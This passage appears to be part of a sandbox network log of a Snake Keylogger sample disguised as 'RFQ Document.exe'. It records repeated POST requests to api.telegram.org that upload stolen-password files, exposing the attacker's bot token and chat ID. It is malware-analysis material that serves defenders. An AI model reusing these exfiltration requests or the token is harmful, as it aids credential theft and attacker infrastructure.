{"ok":true,"result":{"message_id":12726,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49788	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:23 UTC	22	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c383480a Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:23 UTC	22	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 38 33 34 38 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c383480aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:23 UTC	22	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:23 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:23 UTC	23	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12593,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
140	192.168.2.4	49939	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:01 UTC	223	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255da226dbb Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:01 UTC	224	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 32 32 36 64 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255da226dbbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:01 UTC	224	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:01 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:01 UTC	224	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12727,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
141	192.168.2.4	49940	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:01 UTC	225	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255da416c4b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:01 UTC	225	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 34 31 36 63 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255da416c4bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:01 UTC	226	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:01 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:01 UTC	226	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12728,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.4	49941	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:01 UTC	227	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255da56e2bf Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:01 UTC	227	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 35 36 65 32 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255da56e2bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:01 UTC	227	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:01 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:01 UTC	228	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 31 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12729,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808741,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.4	49942	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:02 UTC	228	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255da7d07f1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:02 UTC	229	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 37 64 30 37 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255da7d07f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:02 UTC	229	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:02 UTC	229	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12730,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.4	49943	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:02 UTC	230	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255da94deb0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:02 UTC	230	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 39 34 64 65 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255da94deb0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:02 UTC	231	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:02 UTC	231	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12731,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.4	49944	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:02 UTC	231	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dab3dcf1 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:02 UTC	232	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 61 62 33 64 63 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255dab3dcf1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:02 UTC	232	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:02 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:02 UTC	233	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 34 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12732,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808742,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.4	49948	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:02 UTC	233	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255dad2dbd1 Host: api.telegram.org Content-Length: 407
